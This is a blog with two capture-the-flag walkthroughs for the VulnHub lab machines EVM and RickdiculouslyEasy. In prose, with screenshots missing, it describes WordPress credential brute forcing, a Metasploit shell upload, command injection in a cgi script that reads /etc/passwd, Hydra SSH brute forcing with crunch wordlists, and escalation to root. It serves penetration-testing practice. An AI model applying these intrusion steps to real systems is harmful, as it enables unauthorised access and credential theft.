AdSense

Tuesday, January 25, 2022

EVM

EVM

- Layout for this exercise:



1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine EVM, from the VulnHub pentesting platform.

-  EVM can be downloaded from here:

https://www.vulnhub.com/entry/evm-1,391/

- Once downloaded EVM and extracted with VirtualBox:






2 - ENUMERATION

- netdiscover helps to find EVM's IP 192.168.1.31:






- Scanning with Nmap:













- Browsing the web server there is a message about a wordpress vulnerable webapp:





















3 - EXPLOITATION

- WPScan discovers plugins and users at Wordpress, for instance user c0rrupt3d_brain:





- Again WPSCan, now in combination with wordlist rockyou.txt, discovers credentials c0rrupt3d_brain:24992499
















- Metasploit exploit wp_admin_shell_upload helps to trigger a shell, by setting c0rrupt3d_brain:24992499 as parameters:









- Running the exploit a Meterpreter session is opened:












4 - PRIVILEGE ESCALATION

- Looking for folders and files we find root3r:








- Inside root3r there is a text file .root_password_ssh.txt where we can find the password willy26:
















- However it is not valid to SSH as a root:



- Trying another way, to switch as a root from the Meterpreter session we need a shell:









- Improving the shell:






- Now a root shell is achieved:



5 - CAPTURING THE FLAG

- Finally, reading proof.txt:

















Wednesday, January 19, 2022

RickdiculouslyEasy

RICKDICULOUSLY EASY

- Layout for this exercise:



- The goal of this exercise is to develop a hacking process for the vulnerable machine RickdiculouslyEasy, from the VulnHub pentesting platform.

RickdiculouslyEasy can be downloaded from here:

https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/


- Once downloaded RickdiculouslyEasy and extracted with VirtualBox:


- Description of the virtual machine says that there are 130 points worth of FLAGs available:











- Searching for IP 192.168.1.29:





- Scanning with Nmap:












- Exploring FTP server we find that there is Anonymous login allowed:



















- A 10 points FLAG (10/130) is available:
















- Scanning port 22 we don't find nothing special:
















- Another 10 points FLAG (20/130) is available just by scanning port 13337:




- Scanning port 9090 we find a web server:


- Browsing the server at port 9090 we find a 10 points FLAG (30/130):


























- Scanning port 60000 suggest the presence of a reverse shell available:



- Connecting to the port 60000 with NetCat we discover a 10 points FLAG (40/130):







- Scanning port 80:











- Dirbusting port 80 we find robots.txt and passwords:























- robots.txt points to two cgi scripts:









- Going to webpage passwords:














- Reading a 10 points FLAGS (50/130):







- Also, there are directions for a password that could be hidden:










- Just viewing the source we find the password winter:












- First cgi script is under construction:







- Second cgi script leads to a tracer:











- Trying to run commands at the tracer, it works with id:
















- cat and more provide /etc/passwd, where we learn about users RickSanchez, Morty and Summer:










































- Scanning port 22222, it  is a SSH server:











- Trying credentials morty:winter access is denied:





- Trying credentials Summer:winter it works:







- Another 10 points FLAG (60/130) is available:

























- Unfortunately user Summer does not have sudoer privileges:











- Looking for files into /home:





- Morty has interesting files inside his home folder:











-Transferring Safe_Password.jpg and journal.txt.zip from RickdiculouslyEasy to Kali:






- Transfer is successful:











- Applying command strings over the picture Safe_password.jpg we discover password Meeseek, needed for opening journal.txt.zip:







- Unzipping with password Meeseek we find a 20 points FLAG (80/130). It says that the flag 131333 could be a safe password, and interesting hint for later:



- Now, let's explore user RickSanchez's home folder:










- There is the executable file safe:











- However it's not possible to run it:







- Let's transfer safe to Kali:






- Running ./safe, it seems some argument is needed:







- Inputing flag 131333 we discover a 20 points FLAG (100/130 points). Also, some directions to find RickSanchez's password:











- The other folder does not contain flags:


















- So let's try to apply hints found before for RickSanchez's password:










- First of all, we are able to find information about RickSanchez's band just by using Google:





- Now, taking the 3 words of the band (The, Flesh, Curtains), and applying crunch:





















- Joining the three files into one:



- Applying Hydra to user RickSanchez and passing ps.txt for passwords at port SSH 22222, we find the new password P7Curtains:



- SSH-ing with credentials RickSanchez:P7Curtains is succesful:








- It happens that user RickSanchez has (ALL)ALL sudoer privileges:









- Getting a root shell:





- Reading the last 30 points FLAG (130/130):